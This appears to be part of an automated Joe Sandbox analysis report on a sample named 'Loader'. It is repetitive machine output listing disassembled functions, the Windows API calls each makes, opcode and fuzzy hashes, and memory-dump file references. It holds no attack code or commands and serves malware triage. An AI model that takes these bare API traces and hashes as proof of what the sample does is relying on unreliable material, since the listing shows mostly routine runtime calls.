                                                                                                  • API ID: File$HandleModule$CloseCreateNameReadSize_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3505371420-0
                                                                                                  • Opcode ID: 1d69ddb8aaee2f16b91e35c8b001e23110b5b914f05bebb74f903a24c309ccac
                                                                                                  • Instruction ID: 7697b997bde2b5634aaa2fb01833ef46cdbb7007bba79ec984a973f839df15b7
                                                                                                  • Opcode Fuzzy Hash: 1d69ddb8aaee2f16b91e35c8b001e23110b5b914f05bebb74f903a24c309ccac
                                                                                                  • Instruction Fuzzy Hash: E6F0E5B291521067D1216725FC0BFEB3BA8EFC5725F410514F6CA47181D97455458BD3
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,009403A4,?,00000000,?,?,00940044,?,00000007,?,?,0094098A,?,?), ref: 0093BFDD
                                                                                                  • GetLastError.KERNEL32(?,?,009403A4,?,00000000,?,?,00940044,?,00000007,?,?,0094098A,?,?), ref: 0093BFE8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 485612231-0
                                                                                                  • Opcode ID: e2461dc2c4690f4b53006182042ba05d1f2535f809d8ebd8d36c81d982970ae5
                                                                                                  • Instruction ID: 352570fa719a7554b16c1ba6e265278a2b42d7298800359d506ad76395d990eb
                                                                                                  • Opcode Fuzzy Hash: e2461dc2c4690f4b53006182042ba05d1f2535f809d8ebd8d36c81d982970ae5
                                                                                                  • Instruction Fuzzy Hash: BFE08C32109354ABCB212FA6EC08B897B6CDB80792F104020F708971A0CB309840DF90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8d0e6c9a01aa1d54164fb7fb10b22ce1d45dcc589de3509be45d4e00793ef89a
                                                                                                  • Instruction ID: a8da36c5628b973c142293c74dfa3fdf558f51d1e4a87d10da3d73e5fba6a2e8
                                                                                                  • Opcode Fuzzy Hash: 8d0e6c9a01aa1d54164fb7fb10b22ce1d45dcc589de3509be45d4e00793ef89a
                                                                                                  • Instruction Fuzzy Hash: 6441BF32A0822AAFCF14DF69D4909EDB7F9FF08310B54012AE402E7654EB71ED56DB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1fb66d8a8dfbc71e3532f2ef9792328ff584a273b8888c4b765b7b8923fdfb13
                                                                                                  • Instruction ID: 14e3a91140cb9d128f17cd7755459602b48c74e3f97442a09397cebf47a2de62
                                                                                                  • Opcode Fuzzy Hash: 1fb66d8a8dfbc71e3532f2ef9792328ff584a273b8888c4b765b7b8923fdfb13
                                                                                                  • Instruction Fuzzy Hash: 463185B291452AAFCF14DF68E8809EDB7B8BF09320B14066AE556E3694D731F944CB90
                                                                                                  APIs
                                                                                                    • Part of subcall function 0092B164: GetModuleHandleExW.KERNEL32(00000002,00000000,00928BCA,?,?,0092B127,00928BCA,?,0092B0F8,00928BCA,?,?,?), ref: 0092B170
                                                                                                  • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,F84A4DD6,?,?,?,Function_0002BF84,000000FF), ref: 0092B267
                                                                                                    • Part of subcall function 0092B09A: std::_Throw_Cpp_error.LIBCPMT ref: 0092B0BB
                                                                                                    • Part of subcall function 0092F0C2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00928FEA,0092A490), ref: 0092F0D7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3627539351-0
                                                                                                  • Opcode ID: 0febbd09b9d8a5560a882be6eec4b6c4bf9c600796ce12db5963a9e00507f73d
                                                                                                  • Instruction ID: d13b30f86ff9f48121fd40c02e8f2d0b80df2b3e630599ad102dea7b46b77c37
                                                                                                  • Opcode Fuzzy Hash: 0febbd09b9d8a5560a882be6eec4b6c4bf9c600796ce12db5963a9e00507f73d
                                                                                                  • Instruction Fuzzy Hash: 8311EB326087209BCB256B66FC11B2E77F8FB85F21F14441AF825976A9CF35D800CB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 35bf81e6519ee4ee6c7670322fdaf24870bfdd26d1326c1ec07b656715b15a75
                                                                                                  • Instruction ID: e95f64ceee985718313a646ede9b6fe5c6bba00dda753065edd6fc188858f47f
                                                                                                  • Opcode Fuzzy Hash: 35bf81e6519ee4ee6c7670322fdaf24870bfdd26d1326c1ec07b656715b15a75
                                                                                                  • Instruction Fuzzy Hash: ED01B53322A3259B9B1A8EADFC5095733BAFBC5774B254524F910D7194DF319801AB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalLeaveSection
                                                                                                  • String ID:
                                                                                                  • API String ID: 3988221542-0
                                                                                                  • Opcode ID: 76cd51f52d17e1c2ce6584d603da30edf05aee2e0b83195b2d57524cd0ea691f
                                                                                                  • Instruction ID: c3a685cdcbaf48bb23414868f692038e77819d52440479eea2697f9a2904b2ea
                                                                                                  • Opcode Fuzzy Hash: 76cd51f52d17e1c2ce6584d603da30edf05aee2e0b83195b2d57524cd0ea691f
                                                                                                  • Instruction Fuzzy Hash: 6D0144B364C2661FCF09DB38B8246ACBF20FF86334B20416FE092856CACB129855C740
                                                                                                  APIs
                                                                                                  • Concurrency::details::_Release_chore.LIBCPMT ref: 00927966
                                                                                                    • Part of subcall function 0092B104: CloseThreadpoolWork.KERNEL32(?,00000000,?,00927A7A,00000000), ref: 0092B112
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
                                                                                                  • String ID:
                                                                                                  • API String ID: 312417170-0
                                                                                                  • Opcode ID: e0bc89dd4ecb4bbb306828aaf2cd480838306be113451a8cf7fad132262b1dba
                                                                                                  • Instruction ID: 1ae075a7db881bdeadef1eb8663917b18413fe1f09d53a60a342b7134099dac0
                                                                                                  • Opcode Fuzzy Hash: e0bc89dd4ecb4bbb306828aaf2cd480838306be113451a8cf7fad132262b1dba
                                                                                                  • Instruction Fuzzy Hash: A8014BB1C006599BDB00DF94DC4679EFBB4FB44720F004639E81967341D379AA55CBD2
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000000,0093E025,?,?,0093E025,00000220,?,00000000,?), ref: 0093C033
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: e8431d1bbd349c33121d7194f73de86d620accb16ac6006e3f40dc69758775eb
                                                                                                  • Instruction ID: 28cfb4a8b21b722a94e029ea19e5af6bbf23049eacbcff2d7fc1cd52e0c81045
                                                                                                  • Opcode Fuzzy Hash: e8431d1bbd349c33121d7194f73de86d620accb16ac6006e3f40dc69758775eb
                                                                                                  • Instruction Fuzzy Hash: B9E06DA1605AA0E6EE396B669C05B6B764C9B81BF0F150160FC09B71D1EF64DC009FA1
                                                                                                  APIs
                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00929AAF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                  • String ID:
                                                                                                  • API String ID: 118556049-0
                                                                                                  • Opcode ID: d836765dddf7b3651e4da67c9173b5139c97e23ef00379a26856d87d4c399ff4
                                                                                                  • Instruction ID: d561110e73f9d3a9aa6d165237b00abadbb2f8634f3b349e5482944fb528131f
                                                                                                  • Opcode Fuzzy Hash: d836765dddf7b3651e4da67c9173b5139c97e23ef00379a26856d87d4c399ff4
                                                                                                  • Instruction Fuzzy Hash: 3DD0A73A7112304F4724BF2AB81486E73A5FFC87313660459E840D7359C724DC0287C0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __floor_pentium4
                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                  • Opcode ID: 4e751eaab0236659d662719c85b6debd885b3dabbaf30261513f734efe47ac15
                                                                                                  • Instruction ID: ffb8edf268f7e14b5055141c2e9fa4e15eadc35a549bc8c27f8a44f02bcb84ae
                                                                                                  • Opcode Fuzzy Hash: 4e751eaab0236659d662719c85b6debd885b3dabbaf30261513f734efe47ac15
                                                                                                  • Instruction Fuzzy Hash: F3D22A71E086298FDB65CE28DD40BEEB7B9EB44305F1445EAD40DE7240EB78AE858F41
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,009414AD,00000002,00000000,?,?,?,009414AD,?,00000000), ref: 00941B90
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,009414AD,00000002,00000000,?,?,?,009414AD,?,00000000), ref: 00941BB9
                                                                                                  • GetACP.KERNEL32(?,?,009414AD,?,00000000), ref: 00941BCE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  • Opcode ID: c0fed1cb34b61ae36971a14d109869236ff69875c8b5362b3a4dda1861a3a4a8
                                                                                                  • Instruction ID: 331ba323c29fe42a42e9fb0e33e0363336fd3d690a8ca67e99a83ecf9bfde633
                                                                                                  • Opcode Fuzzy Hash: c0fed1cb34b61ae36971a14d109869236ff69875c8b5362b3a4dda1861a3a4a8
                                                                                                  • Instruction Fuzzy Hash: 3721A732B10204ABEB348F15C900E9773AEEF54BA5B968564E94AD7118F732DEC0D750
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093C25A: GetLastError.KERNEL32(?,?,00935585,00958E90,0000000C), ref: 0093C25E
                                                                                                    • Part of subcall function 0093C25A: SetLastError.KERNEL32(00000000), ref: 0093C300
                                                                                                  • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0094147F
                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 009414BD
                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 009414D0
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00941518
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00941533
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 415426439-0
                                                                                                  • Opcode ID: f6ff4f33dba40702736f47f35b1884d2114cf9eba2b2f517f05edf8a8496d42d
                                                                                                  • Instruction ID: 30f6e74a4c1d050eb1b338f5ed4a7bf3a370adef95191de573cc4b38ee70f4d6
                                                                                                  • Opcode Fuzzy Hash: f6ff4f33dba40702736f47f35b1884d2114cf9eba2b2f517f05edf8a8496d42d
                                                                                                  • Instruction Fuzzy Hash: 56516D72A00209ABDB24DFA5CC45FBE77B8FF88741F144429F915EB1A0E7709A848B61
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                  • Instruction ID: d88ad5e4ee927056509c7e63304dc72c6b3548c07f0107044f5fcc62cf9fd013
                                                                                                  • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                  • Instruction Fuzzy Hash: 49022971E012199BDF14CFA9C9807AEBBB5FF88314F248269E919E7240D771AE418F91
                                                                                                  APIs
                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009421C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFindFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 1974802433-0
                                                                                                  • Opcode ID: 2d74eb8adaf1b6ed9c2dea77d71121050215ab6bc641f8771f0af925010b3300
                                                                                                  • Instruction ID: 28b38af8a32c483d1eaad4d6b034f7cabafc7dfb6db80621c33cf17404d59c5c
                                                                                                  • Opcode Fuzzy Hash: 2d74eb8adaf1b6ed9c2dea77d71121050215ab6bc641f8771f0af925010b3300
                                                                                                  • Instruction Fuzzy Hash: 5971D175D091689FDF25AF24CC89EAEB7B9BF49304F9442D9F048A7211DB345E849F10
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0092F9E5
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0092FAB1
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0092FACA
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0092FAD4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 254469556-0
                                                                                                  • Opcode ID: a989e965de73543617cbbbc934d9978363227b78da2a7055348a6b84ffcb4edf
                                                                                                  • Instruction ID: f839d7df67ff2ea49d092e2eba4747eacaa34f92656bca537b0edc27c73cbcfd
                                                                                                  • Opcode Fuzzy Hash: a989e965de73543617cbbbc934d9978363227b78da2a7055348a6b84ffcb4edf
